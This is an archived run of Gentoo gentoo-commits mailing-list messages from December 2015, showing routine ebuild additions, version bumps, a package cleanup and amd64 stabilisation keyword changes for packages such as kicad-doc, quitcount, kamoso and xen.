URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=62aa2af1

app-doc/kicad-doc: Bump to new stable version 4.0.1

Gentoo-Bug: #568088

 app-doc/kicad-doc/Manifest   |  1 +
 app-doc/kicad-doc/kicad-doc-4.0.1.ebuild | 61 
 2 files changed, 62 insertions(+)

diff --git a/app-doc/kicad-doc/Manifest b/app-doc/kicad-doc/Manifest
index c87120c..6251798 100644
--- a/app-doc/kicad-doc/Manifest
+++ b/app-doc/kicad-doc/Manifest
@@ -1,3 +1,4 @@
 DIST kicad-doc-4.0.0.tar.gz 23358151 SHA256 
8599873bfbb3ae824e93e0f78464ae303ef1df3331fbf9bc5591a5610a375d89 SHA512 
4a7b2095af51bfa6f4399ba45d5f54e1c8c576195e640b025b07448fc0eb7a6144cf60630e30405ab57afc39cfb778dc63a9c675a0fc01cb3dfc870aed15e1ae
 WHIRLPOOL 
b24690e44c5e1832d95f4f83a25130a3b7d9986359da4919b7a778a6e2aaca4022cc27617b88815af5a4aa78f53b73adeb7ec7d15e69eb35d47cc7a39480f444
 DIST kicad-doc-4.0.0_rc1.tar.gz 35078269 SHA256 
3e26397455f36ff902f3c93d32b4c0063f44069e88a0d477475bb0b1dbf75140 SHA512 
77c5ae067ec480ae0bec4fe8b6de53d05e675ba29695b5de2b39d9019262cd2b376123e8f978db5d362b157b8dd6fba8ecf1604262d0ae31ee5a37de5538dff7
 WHIRLPOOL 
9afebc3419a69d57377ec10c44d5a4346bd6ccb75c50795809205e9490f35fdd7d0046a37319d49a99766aecec53c8b0287d1beca4788310a957bf854f58e641
 DIST kicad-doc-4.0.0_rc2.tar.gz 23393365 SHA256 
fc86546a370c43f0f00b78ea32276defed68fded1d56069bc82ef6d44f359099 SHA512 
a0bf17e833e91e334530f7e19a2450fbecfef5640060b463b6351cf7dc7ab25bdd7575dd12150dc17cea9a2c5890ac29e88bad851d15840f47143e6de6eac318
 WHIRLPOOL 
2fbf65bab1a19da9be0fa6dce80c027795515bc4e196960ed8edbcd9fad0120a350ffcb712bc4469d16a5cef8b1a6dd470dd7e31f7fd7f2c7d73c436bf1e46bf
+DIST kicad-doc-4.0.1.tar.gz 23365382 SHA256 
be8dc4bddb89869996956d3d1421584c5a8197282997902e22fda888a8d433bb SHA512 
ae57a9c29f3cd4b3d85d4b7d7bc940957c33b0e1c1404b82c8a9261695c0670866cb4a95ab7ad5c35b1faa6fbd3969f277467fa7d33e38e728a3dd9b65203021
 WHIRLPOOL 
d9834312a0a315bf1d5dca048999d5adcb2ee60c42a41d8266522ad6c0ca49ec7bad5c9bad322b6d73c41c9f24cb1f4088d6889c6a51abf4671271dd7ec8af9d

diff --git a/app-doc/kicad-doc/kicad-doc-4.0.1.ebuild 
b/app-doc/kicad-doc/kicad-doc-4.0.1.ebuild
new file mode 100644
index 000..4f755f3
--- /dev/null
+++ b/app-doc/kicad-doc/kicad-doc-4.0.1.ebuild
@@ -0,0 +1,61 @@
+# Copyright 1999-2015 Gentoo Foundation
+# Distributed under the terms of the GNU General Public License v2
+# $Id$
+
+EAPI=5
+
+inherit cmake-utils vcs-snapshot
+
+DESCRIPTION="Electronic Schematic and PCB design tools manuals"
+HOMEPAGE="http://www.kicad-pcb.org;
+SRC_URI="https://github.com/KiCad/${PN}/archive/${PV}.tar.gz -> ${P}.tar.gz"
+
+LICENSE="GPL-2"
+SLOT="0"
+KEYWORDS="~amd64"
+FUSE="html pdf"
+LANGS="en fr it ja nl pl"
+LINGUAS=""
+for lang in ${LANGS} ; do
+   LINGUAS="${LINGUAS} linguas_${lang}"
+done
+IUSE="${FUSE} ${LINGUAS}"
+
+REQUIRED_USE="( || ( pdf html ) ) ( ^^ ( ${LINGUAS} ) )"
+
+DEPEND=">=app-text/asciidoc-8.6.9
+   app-text/dblatex
+   >=app-text/po4a-0.45
+   >=sys-devel/gettext-0.18
+   dev-util/source-highlight
+   dev-perl/Unicode-LineBreak
+   linguas_ja? ( media-fonts/vlgothic )"
+RDEPEND=""
+
+src_prepare() {
+   DOCPATH="KICAD_DOC_INSTALL_PATH share/doc/kicad"
+   sed "s|${DOCPATH}|${DOCPATH}-${PV}|g" -i CMakeLists.txt || die "sed 
failed"
+}
+
+src_configure() {
+   local formats=""
+   local doclang=""
+
+   # construct format string
+   for format in ${FUSE}; do
+   use $format && formats+="${format};"
+   done
+
+   # find out which language is requested
+   for lang in ${LANGS}; do
+   if use linguas_${lang}; then
+   doclang=${lang}
+   fi
+   done
+
+   local mycmakeargs+=(
+   -DBUILD_FORMATS="${formats}"
+   -DSINGLE_LANGUAGE="${doclang}"
+   )
+   cmake-utils_src_configure
+}



[gentoo-commits] repo/gentoo:master commit in: x11-misc/quitcount/

2015-12-14 Thread Ian Delaney
commit: 7b52fc455b59a5f84acc45589b8e74c61d65ea5a
Author: Ian Delaney  gentoo  org>
AuthorDate: Tue Dec 15 06:14:22 2015 +
Commit: Ian Delaney  gentoo  org>
CommitDate: Tue Dec 15 07:15:12 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=7b52fc45

x11-misc/quitcount: New ebuild submitted via buzilla bug #542072

A tiny system tray applet, author set as proxy maintainer under the
proxy-maintainers project, fixes the gentoo bug

Gentoo bug: #542072

Package-Manager: portage-2.2.24

 x11-misc/quitcount/Manifest   |  1 +
 x11-misc/quitcount/metadata.xml   | 10 ++
 x11-misc/quitcount/quitcount-3.1.3.ebuild | 28 
 3 files changed, 39 insertions(+)

diff --git a/x11-misc/quitcount/Manifest b/x11-misc/quitcount/Manifest
new file mode 100644
index 000..3ad4252
--- /dev/null
+++ b/x11-misc/quitcount/Manifest
@@ -0,0 +1 @@
+DIST quitcount-3.1.3.tar.gz 403607 SHA256 
d8c21bb0cf67d729d51a7921b86bb3ab75003253ba03b26d605ce5b48b33713a SHA512 
92e088b8272657f14e60d91589963cfcefe84ead9f4d90aa3a77ac9612fe216f558e0378788edde7680a3dba131021bf72129fbc1291eca83cd232490f486f9f
 WHIRLPOOL 
757deda35a4d8b9079dd5f333ce488e1f00b5c6af15da789cb1e210f61be2170b5509e34c899f4aecd6f745660fdcf7b1e4ee2244a071f7b512abd64078ef5c1

diff --git a/x11-misc/quitcount/metadata.xml b/x11-misc/quitcount/metadata.xml
new file mode 100644
index 000..e275ac6
--- /dev/null
+++ b/x11-misc/quitcount/metadata.xml
@@ -0,0 +1,10 @@
+
+http://www.gentoo.org/dtd/metadata.dtd;>
+
+   proxy-maintainers
+   
+   Laurent Vivier
+   laur...@lamzi.com
+   Proxied maintainer; set to assignee in all 
bugs
+   
+

diff --git a/x11-misc/quitcount/quitcount-3.1.3.ebuild 
b/x11-misc/quitcount/quitcount-3.1.3.ebuild
new file mode 100644
index 000..af6a20e
--- /dev/null
+++ b/x11-misc/quitcount/quitcount-3.1.3.ebuild
@@ -0,0 +1,28 @@
+# Copyright 1999-2015 Gentoo Foundation
+# Distributed under the terms of the GNU General Public License v2
+# $Id$
+
+EAPI=5
+inherit gnome2-utils
+
+# The string in SRC_URI doesn't follow standard naming convention
+MV="3.1"
+DESCRIPTION="A simple applet that shows what you saved since you quit smoking."
+HOMEPAGE="http://quitcount.sourceforge.net/;
+SRC_URI="mirror://sourceforge/${PN}/${MV}/${P}.tar.gz"
+
+LICENSE="GPL-3"
+SLOT="0"
+KEYWORDS="~x86 ~amd64"
+DEPEND="x11-libs/gtk+:3
+   >=dev-libs/glib-2.6:2"
+
+RDEPEND="${DEPEND}"
+
+pkg_postinst() {
+   gnome2_icon_cache_update
+}
+
+pkg_postrm() {
+   gnome2_icon_cache_update
+}



[gentoo-commits] repo/gentoo:master commit in: dev-ruby/curb/

2015-12-14 Thread Hans de Graaff
commit: c2d025e4f6154fa6d74b9eea331b081a360e614d
Author: Hans de Graaff  gentoo  org>
AuthorDate: Tue Dec 15 06:17:30 2015 +
Commit: Hans de Graaff  gentoo  org>
CommitDate: Tue Dec 15 06:17:30 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=c2d025e4

dev-ruby/curb: cleanup

Package-Manager: portage-2.2.24

 dev-ruby/curb/Manifest  |  1 -
 dev-ruby/curb/curb-0.8.6.ebuild | 42 -
 2 files changed, 43 deletions(-)

diff --git a/dev-ruby/curb/Manifest b/dev-ruby/curb/Manifest
index 1d8b65b..ba143bf 100644
--- a/dev-ruby/curb/Manifest
+++ b/dev-ruby/curb/Manifest
@@ -1,2 +1 @@
-DIST curb-0.8.6.gem 79872 SHA256 
8c36f7f88f70fe12c23abd2238c6a83055a0bec41acd5c85695dea9ce91c54d0 SHA512 
5dcba8907128bab39ce498ca6549ed8c4908754a2db1eeb1864915a6da59f52ef72aa173e03aa7ed1ff9be25da8c58d8af904d775cfdde5fd829634ea86389ec
 WHIRLPOOL 
4a1ddace01046e19d480537efd29b0bd048ce55f9c32b4f68cc62de58b5295262b700fd0023760087b38597c90ff0b33ef9c3128f3a0320201b9df82f5e9
 DIST curb-0.8.8.gem 80384 SHA256 
ec3b5880d92c9a9140555fc5c86524025474a905e6548e1c37816247ad60903e SHA512 
441025ae199266009bc3f8a2068245a4ee0b83f72babc35cc4fa744b0f3efe13ba26c5f795ff6f429bb7bfbd5ce31d51e5de6b65c3f10285d9a9f5909eff286f
 WHIRLPOOL 
e3e371d948fe1f008e34de944fc602267421f643eeec32a7408806dc6e7abc440e73ab63583273247330657ea7bebe7caa4957d95160ab66509110f2acf99ce5

diff --git a/dev-ruby/curb/curb-0.8.6.ebuild b/dev-ruby/curb/curb-0.8.6.ebuild
deleted file mode 100644
index 06f462d..000
--- a/dev-ruby/curb/curb-0.8.6.ebuild
+++ /dev/null
@@ -1,42 +0,0 @@
-# Copyright 1999-2015 Gentoo Foundation
-# Distributed under the terms of the GNU General Public License v2
-# $Id$
-
-EAPI=5
-
-USE_RUBY="ruby19 ruby20 ruby21 ruby22"
-
-RUBY_FAKEGEM_RECIPE_TEST="rake"
-RUBY_FAKEGEM_RECIPE_DOC="rdoc"
-
-inherit ruby-fakegem
-
-DESCRIPTION="Ruby-language bindings for libcurl"
-HOMEPAGE="http://curb.rubyforge.org/;
-
-LICENSE="Ruby"
-SLOT="0"
-KEYWORDS="~amd64"
-IUSE=""
-
-DEPEND+=" net-misc/curl[ssl]"
-RDEPEND+=" net-misc/curl[ssl]"
-
-all_ruby_prepare() {
-   # fix tests when localhost is also ::1
-   sed -i -e 's|localhost:|127.0.0.1:|g' tests/*.rb || die
-
-   # avoid tests making outside network connections
-   rm tests/bug_postfields_crash.rb || die
-   sed -e '/test_easy_http_verbs_must_respond_to_str/,/^  end/ s:^:#:' \
-   -i tests/tc_curl_easy.rb || die
-}
-
-each_ruby_configure() {
-   ${RUBY} -Cext extconf.rb || die "extconf.rb failed"
-}
-
-each_ruby_compile() {
-   emake -Cext CFLAGS="${CFLAGS} -fPIC" archflags="${LDFLAGS}" V=1
-   cp -l ext/curb_core$(get_modname) lib || die
-}



[gentoo-commits] proj/kde:master commit in: media-video/kamoso/

2015-12-14 Thread Michael Palimaka
commit: 59a0a5122bf205db10b362c2a2489f3a3685f7b9
Author: Michael Palimaka  gentoo  org>
AuthorDate: Mon Dec 14 13:09:17 2015 +
Commit: Michael Palimaka  gentoo  org>
CommitDate: Mon Dec 14 13:09:17 2015 +
URL:https://gitweb.gentoo.org/proj/kde.git/commit/?id=59a0a512

media-video/kamoso: force handbook to be optional

Package-Manager: portage-2.2.26

 media-video/kamoso/kamoso-.ebuild | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/media-video/kamoso/kamoso-.ebuild 
b/media-video/kamoso/kamoso-.ebuild
index 144cb05..b8875c7 100644
--- a/media-video/kamoso/kamoso-.ebuild
+++ b/media-video/kamoso/kamoso-.ebuild
@@ -4,7 +4,7 @@
 
 EAPI=5
 
-KDE_HANDBOOK="true"
+KDE_HANDBOOK="forceoptional"
 inherit kde5
 
 DESCRIPTION="Application to take pictures and videos from your webcam by KDE"



[gentoo-commits] repo/gentoo:master commit in: media-video/kamoso/

2015-12-14 Thread Michael Palimaka
commit: b1bea265b23cb34b20c2eb15b9d8d2600bba7b71
Author: Michael Palimaka  gentoo  org>
AuthorDate: Mon Dec 14 13:07:46 2015 +
Commit: Michael Palimaka  gentoo  org>
CommitDate: Mon Dec 14 13:09:05 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=b1bea265

media-video/kamoso: version bump

Package-Manager: portage-2.2.26

 media-video/kamoso/Manifest|  1 +
 media-video/kamoso/kamoso-3.1.0.ebuild | 33 +
 2 files changed, 34 insertions(+)

diff --git a/media-video/kamoso/Manifest b/media-video/kamoso/Manifest
index f121c2d..aebfe84 100644
--- a/media-video/kamoso/Manifest
+++ b/media-video/kamoso/Manifest
@@ -1 +1,2 @@
 DIST kamoso-3.0.tar.xz 109340 SHA256 
bd19e8771e91fb8bfa15df2c316e056eb2ac207252c3d6c02fc81a19d1845d46 SHA512 
9d00dab4bad9b17a35de2a5f883d2194509686aa72197c4ac5277bcaa69676d9af867f3889788805f0640626e1bdd2be4746b7e7a9b67b9a00b58a98a7609e6d
 WHIRLPOOL 
decb88362059021979250ce19086d62d3517537006478df028ead96f8b1a581c011f0e456a1a0d115589f5b7cbc812a20409657aca0d33c2c76bee5abca1d077
+DIST kamoso-3.1.0.tar.xz 131048 SHA256 
e0a13bd0db364c2b3f3143dd7ae92ea5a4e0c9474771cf9546de340ad4a2b3d6 SHA512 
71a4a516e902dfea45fd0f87bce63fe245c3751a88ab8f7a40b23b15ab4320f5c2be794d3cacfce2fa7a2d9661844184ed7db1f7fdfcd9a261710acffc894347
 WHIRLPOOL 
a5a4e4824aa024ae01720ba0874a36934c632cdc76cdbb6e60eda51d81d0cd72de1d89febc193738c01708ee07eba1d65b59d978ecb6498bc332a682ea0deb77

diff --git a/media-video/kamoso/kamoso-3.1.0.ebuild 
b/media-video/kamoso/kamoso-3.1.0.ebuild
new file mode 100644
index 000..0081f03
--- /dev/null
+++ b/media-video/kamoso/kamoso-3.1.0.ebuild
@@ -0,0 +1,33 @@
+# Copyright 1999-2015 Gentoo Foundation
+# Distributed under the terms of the GNU General Public License v2
+# $Id$
+
+EAPI=5
+
+KDE_HANDBOOK="forceoptional"
+inherit kde5 versionator
+
+DESCRIPTION="Application to take pictures and videos from your webcam by KDE"
+HOMEPAGE="https://userbase.kde.org/Kamoso;
+SRC_URI="mirror://kde/stable/${PN}/$(get_version_component_range 
1-2)/src/${P}.tar.xz"
+
+LICENSE="GPL-2+"
+KEYWORDS="~amd64"
+IUSE=""
+
+DEPEND="
+   $(add_frameworks_dep kconfig)
+   $(add_frameworks_dep kcoreaddons)
+   $(add_frameworks_dep kdeclarative)
+   $(add_frameworks_dep ki18n)
+   $(add_frameworks_dep kio)
+   dev-libs/purpose:5
+   dev-qt/qtdeclarative:5
+   dev-qt/qtgui:5
+   dev-qt/qtwidgets:5
+   media-libs/qt-gstreamer[qt5]
+   virtual/libudev:=
+"
+RDEPEND="${DEPEND}
+   media-plugins/gst-plugins-meta[alsa,theora,vorbis,v4l,xv]
+"



[gentoo-commits] repo/gentoo:master commit in: app-emulation/xen/

2015-12-14 Thread Agostino Sarubbo
commit: 7d056702250ac736532c50c731ea13644b46d149
Author: Agostino Sarubbo  gentoo  org>
AuthorDate: Mon Dec 14 14:10:41 2015 +
Commit: Agostino Sarubbo  gentoo  org>
CommitDate: Mon Dec 14 14:10:41 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=7d056702

app-emulation/xen: amd64 stable wrt bug #566842

Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo  gentoo.org>

 app-emulation/xen/xen-4.5.2-r2.ebuild | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/app-emulation/xen/xen-4.5.2-r2.ebuild 
b/app-emulation/xen/xen-4.5.2-r2.ebuild
index 5f14bc5..07af8f9 100644
--- a/app-emulation/xen/xen-4.5.2-r2.ebuild
+++ b/app-emulation/xen/xen-4.5.2-r2.ebuild
@@ -14,7 +14,7 @@ if [[ $PV == * ]]; then
EGIT_REPO_URI="git://xenbits.xen.org/${PN}.git"
live_eclass="git-2"
 else
-   KEYWORDS="~amd64 ~arm ~arm64 -x86"
+   KEYWORDS="amd64 ~arm ~arm64 -x86"
UPSTREAM_VER=
SECURITY_VER=0
SEC_VER=1



[gentoo-commits] repo/gentoo:master commit in: dev-ruby/rrdtool-bindings/

2015-12-14 Thread Agostino Sarubbo
commit: 691b0b52c4c1a96a22e39ae320931bd238da5e5f
Author: Agostino Sarubbo  gentoo  org>
AuthorDate: Mon Dec 14 14:10:35 2015 +
Commit: Agostino Sarubbo  gentoo  org>
CommitDate: Mon Dec 14 14:10:35 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=691b0b52

dev-ruby/rrdtool-bindings: amd64 stable wrt bug #567586

Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo  gentoo.org>

 dev-ruby/rrdtool-bindings/rrdtool-bindings-1.5.5.ebuild | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/dev-ruby/rrdtool-bindings/rrdtool-bindings-1.5.5.ebuild 
b/dev-ruby/rrdtool-bindings/rrdtool-bindings-1.5.5.ebuild
index 810f889..0e22166 100644
--- a/dev-ruby/rrdtool-bindings/rrdtool-bindings-1.5.5.ebuild
+++ b/dev-ruby/rrdtool-bindings/rrdtool-bindings-1.5.5.ebuild
@@ -20,7 +20,7 @@ RUBY_S="$MY_P"/bindings/ruby
 
 LICENSE="GPL-2"
 SLOT="0"
-KEYWORDS="~amd64 ~arm ~hppa ~mips ~ppc ~ppc64 ~s390 ~sh ~x86 ~x86-fbsd 
~amd64-linux ~ia64-linux ~x86-linux ~x86-macos ~x86-solaris"
+KEYWORDS="amd64 ~arm ~hppa ~mips ~ppc ~ppc64 ~s390 ~sh ~x86 ~x86-fbsd 
~amd64-linux ~ia64-linux ~x86-linux ~x86-macos ~x86-solaris"
 IUSE="graph test"
 REQUIRED_USE="test? ( graph )"
 



[gentoo-commits] repo/gentoo:master commit in: games-util/nml/

2015-12-14 Thread Agostino Sarubbo
commit: d5e5470449b6facdb57f470990f8bea9e8561ad3
Author: Agostino Sarubbo  gentoo  org>
AuthorDate: Mon Dec 14 14:11:07 2015 +
Commit: Agostino Sarubbo  gentoo  org>
CommitDate: Mon Dec 14 14:11:07 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=d5e54704

games-util/nml: amd64 stable wrt bug #568074

Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo  gentoo.org>

 games-util/nml/nml-0.4.2-r1.ebuild | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/games-util/nml/nml-0.4.2-r1.ebuild 
b/games-util/nml/nml-0.4.2-r1.ebuild
index 8ccbac2..7e07528 100644
--- a/games-util/nml/nml-0.4.2-r1.ebuild
+++ b/games-util/nml/nml-0.4.2-r1.ebuild
@@ -12,7 +12,7 @@ 
SRC_URI="http://bundles.openttdcoop.org/nml/releases/${PV}/${P}.tar.gz;
 
 LICENSE="GPL-2"
 SLOT="0"
-KEYWORDS="~amd64 ~arm ~ppc ~x86"
+KEYWORDS="amd64 ~arm ~ppc ~x86"
 
 RDEPEND="dev-python/pillow[zlib,${PYTHON_USEDEP}]
dev-python/ply[${PYTHON_USEDEP}]"



[gentoo-commits] repo/gentoo:master commit in: app-emulation/vice/

2015-12-14 Thread Agostino Sarubbo
commit: 27c73a1664805323491fb096cc4de04316f130ee
Author: Agostino Sarubbo  gentoo  org>
AuthorDate: Mon Dec 14 14:11:20 2015 +
Commit: Agostino Sarubbo  gentoo  org>
CommitDate: Mon Dec 14 14:11:20 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=27c73a16

app-emulation/vice: amd64 stable wrt bug #568078

Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo  gentoo.org>

 app-emulation/vice/vice-2.4.22.ebuild | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/app-emulation/vice/vice-2.4.22.ebuild 
b/app-emulation/vice/vice-2.4.22.ebuild
index a186624..a0138be 100644
--- a/app-emulation/vice/vice-2.4.22.ebuild
+++ b/app-emulation/vice/vice-2.4.22.ebuild
@@ -11,7 +11,7 @@ SRC_URI="mirror://sourceforge/vice-emu/releases/${P}.tar.gz"
 
 LICENSE="GPL-2+"
 SLOT="0"
-KEYWORDS="~amd64 ~ppc ~sparc ~x86"
+KEYWORDS="amd64 ~ppc ~sparc ~x86"
 IUSE="Xaw3d alsa ethernet ffmpeg fullscreen +gtk ipv6 lame nls oss png 
pulseaudio sdl +sdlsound threads vte zlib"
 
 # upstream says gtk3 and sdl2 shouldn't be exposed yet.



[gentoo-commits] repo/gentoo:master commit in: dev-php/PEAR-Mail_Mime/

2015-12-14 Thread Agostino Sarubbo
commit: 87cb782db0576733aec60efa1e4c85399ddc0071
Author: Agostino Sarubbo  gentoo  org>
AuthorDate: Mon Dec 14 14:12:05 2015 +
Commit: Agostino Sarubbo  gentoo  org>
CommitDate: Mon Dec 14 14:12:05 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=87cb782d

dev-php/PEAR-Mail_Mime: amd64 stable wrt bug #567994

Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo  gentoo.org>

 dev-php/PEAR-Mail_Mime/PEAR-Mail_Mime-1.9.0.ebuild | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/dev-php/PEAR-Mail_Mime/PEAR-Mail_Mime-1.9.0.ebuild 
b/dev-php/PEAR-Mail_Mime/PEAR-Mail_Mime-1.9.0.ebuild
index a9fa38e..191bf99 100644
--- a/dev-php/PEAR-Mail_Mime/PEAR-Mail_Mime-1.9.0.ebuild
+++ b/dev-php/PEAR-Mail_Mime/PEAR-Mail_Mime-1.9.0.ebuild
@@ -10,7 +10,7 @@ DESCRIPTION="Provides classes to deal with creation and 
manipulation of mime mes
 
 LICENSE="BSD"
 SLOT="0"
-KEYWORDS="~alpha ~amd64 ~arm ~hppa ~ia64 ~ppc ~ppc64 ~s390 ~sh ~sparc ~x86"
+KEYWORDS="~alpha amd64 ~arm ~hppa ~ia64 ~ppc ~ppc64 ~s390 ~sh ~sparc ~x86"
 IUSE=""
 
 DEPEND=">=dev-lang/php-5.0:*"



[gentoo-commits] repo/gentoo:master commit in: app-text/docbook-xsl-stylesheets/

2015-12-14 Thread Agostino Sarubbo
commit: 85c2ab6e6cf89f4d6019acbbad8e64df5eaa0458
Author: Agostino Sarubbo  gentoo  org>
AuthorDate: Mon Dec 14 14:10:22 2015 +
Commit: Agostino Sarubbo  gentoo  org>
CommitDate: Mon Dec 14 14:10:22 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=85c2ab6e

app-text/docbook-xsl-stylesheets: amd64 stable wrt bug #568160

Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo  gentoo.org>

 app-text/docbook-xsl-stylesheets/docbook-xsl-stylesheets-1.79.0.ebuild | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git 
a/app-text/docbook-xsl-stylesheets/docbook-xsl-stylesheets-1.79.0.ebuild 
b/app-text/docbook-xsl-stylesheets/docbook-xsl-stylesheets-1.79.0.ebuild
index c40eaca..9760c95 100644
--- a/app-text/docbook-xsl-stylesheets/docbook-xsl-stylesheets-1.79.0.ebuild
+++ b/app-text/docbook-xsl-stylesheets/docbook-xsl-stylesheets-1.79.0.ebuild
@@ -14,7 +14,7 @@ SRC_URI="mirror://sourceforge/docbook/${MY_P}.tar.bz2"
 
 LICENSE="BSD"
 SLOT="0"
-KEYWORDS="~alpha ~amd64 ~arm ~arm64 ~hppa ~ia64 ~m68k ~mips ~ppc ~ppc64 ~s390 
~sh ~sparc ~x86 ~ppc-aix ~amd64-fbsd ~sparc-fbsd ~x86-fbsd ~x64-freebsd 
~x86-freebsd ~ia64-hpux ~x86-interix ~amd64-linux ~arm-linux ~x86-linux 
~ppc-macos ~x64-macos ~x86-macos ~m68k-mint ~sparc-solaris ~sparc64-solaris 
~x64-solaris ~x86-solaris"
+KEYWORDS="~alpha amd64 ~arm ~arm64 ~hppa ~ia64 ~m68k ~mips ~ppc ~ppc64 ~s390 
~sh ~sparc ~x86 ~ppc-aix ~amd64-fbsd ~sparc-fbsd ~x86-fbsd ~x64-freebsd 
~x86-freebsd ~ia64-hpux ~x86-interix ~amd64-linux ~arm-linux ~x86-linux 
~ppc-macos ~x64-macos ~x86-macos ~m68k-mint ~sparc-solaris ~sparc64-solaris 
~x64-solaris ~x86-solaris"
 IUSE="ruby"
 
 RDEPEND=">=app-text/build-docbook-catalog-1.1



[gentoo-commits] repo/gentoo:master commit in: dev-ruby/narray/

2015-12-14 Thread Agostino Sarubbo
commit: 23b121b0d5581a1fcae9f07cfb4b873ee64fc536
Author: Agostino Sarubbo  gentoo  org>
AuthorDate: Mon Dec 14 14:10:54 2015 +
Commit: Agostino Sarubbo  gentoo  org>
CommitDate: Mon Dec 14 14:10:54 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=23b121b0

dev-ruby/narray: amd64 stable wrt bug #568040

Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo  gentoo.org>

 dev-ruby/narray/narray-0.6.1.1.ebuild | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/dev-ruby/narray/narray-0.6.1.1.ebuild 
b/dev-ruby/narray/narray-0.6.1.1.ebuild
index d69b8bf..b4f9ba5 100644
--- a/dev-ruby/narray/narray-0.6.1.1.ebuild
+++ b/dev-ruby/narray/narray-0.6.1.1.ebuild
@@ -22,7 +22,7 @@ SRC_URI="https://github.com/masa16/${PN}/archive/${PV}.tar.gz 
-> ${P}.tar.gz"
 
 LICENSE="Ruby"
 SLOT="0"
-KEYWORDS="~amd64 ~hppa ~mips ~ppc ~ppc64 ~x86"
+KEYWORDS="amd64 ~hppa ~mips ~ppc ~ppc64 ~x86"
 
 IUSE=""
 



[gentoo-commits] repo/gentoo:master commit in: games-engines/stratagus/

2015-12-14 Thread Agostino Sarubbo
commit: 9fd66bf97bc89d1cd65bcd21ab46523a848656ea
Author: Agostino Sarubbo  gentoo  org>
AuthorDate: Mon Dec 14 14:11:00 2015 +
Commit: Agostino Sarubbo  gentoo  org>
CommitDate: Mon Dec 14 14:11:00 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=9fd66bf9

games-engines/stratagus: amd64 stable wrt bug #568076

Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo  gentoo.org>

 games-engines/stratagus/stratagus-2.3.0.ebuild | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/games-engines/stratagus/stratagus-2.3.0.ebuild 
b/games-engines/stratagus/stratagus-2.3.0.ebuild
index c049777..2e11ba0 100644
--- a/games-engines/stratagus/stratagus-2.3.0.ebuild
+++ b/games-engines/stratagus/stratagus-2.3.0.ebuild
@@ -11,7 +11,7 @@ 
SRC_URI="https://launchpad.net/stratagus/trunk/2.3/+download/stratagus_${PV}.ori
 
 LICENSE="GPL-2"
 SLOT="0"
-KEYWORDS="~amd64 ~x86"
+KEYWORDS="amd64 ~x86"
 IUSE="bzip2 debug doc fluidsynth mikmod mng theora vorbis"
 
 RDEPEND="dev-db/sqlite:3



[gentoo-commits] repo/gentoo:master commit in: dev-ruby/rdoc/

2015-12-14 Thread Agostino Sarubbo
commit: ace4eb205380530aa782980be496b88ecca4cf2d
Author: Agostino Sarubbo  gentoo  org>
AuthorDate: Mon Dec 14 14:11:13 2015 +
Commit: Agostino Sarubbo  gentoo  org>
CommitDate: Mon Dec 14 14:11:13 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=ace4eb20

dev-ruby/rdoc: amd64 stable wrt bug #568044

Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo  gentoo.org>

 dev-ruby/rdoc/rdoc-4.2.0.ebuild | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/dev-ruby/rdoc/rdoc-4.2.0.ebuild b/dev-ruby/rdoc/rdoc-4.2.0.ebuild
index 4a28db3..ebe3c93 100644
--- a/dev-ruby/rdoc/rdoc-4.2.0.ebuild
+++ b/dev-ruby/rdoc/rdoc-4.2.0.ebuild
@@ -18,7 +18,7 @@ HOMEPAGE="https://github.com/rdoc/rdoc/;
 
 LICENSE="Ruby MIT"
 SLOT="0"
-KEYWORDS="~alpha ~amd64 ~arm ~hppa ~ia64 ~mips ~ppc ~ppc64 ~s390 ~sh ~sparc 
~x86 ~amd64-fbsd ~x86-fbsd ~amd64-linux ~x86-linux ~ppc-macos ~x64-macos 
~x86-macos ~sparc-solaris ~sparc64-solaris ~x64-solaris ~x86-solaris"
+KEYWORDS="~alpha amd64 ~arm ~hppa ~ia64 ~mips ~ppc ~ppc64 ~s390 ~sh ~sparc 
~x86 ~amd64-fbsd ~x86-fbsd ~amd64-linux ~x86-linux ~ppc-macos ~x64-macos 
~x86-macos ~sparc-solaris ~sparc64-solaris ~x64-solaris ~x86-solaris"
 IUSE=""
 
 ruby_add_bdepend "



[gentoo-commits] repo/gentoo:master commit in: dev-python/oslotest/

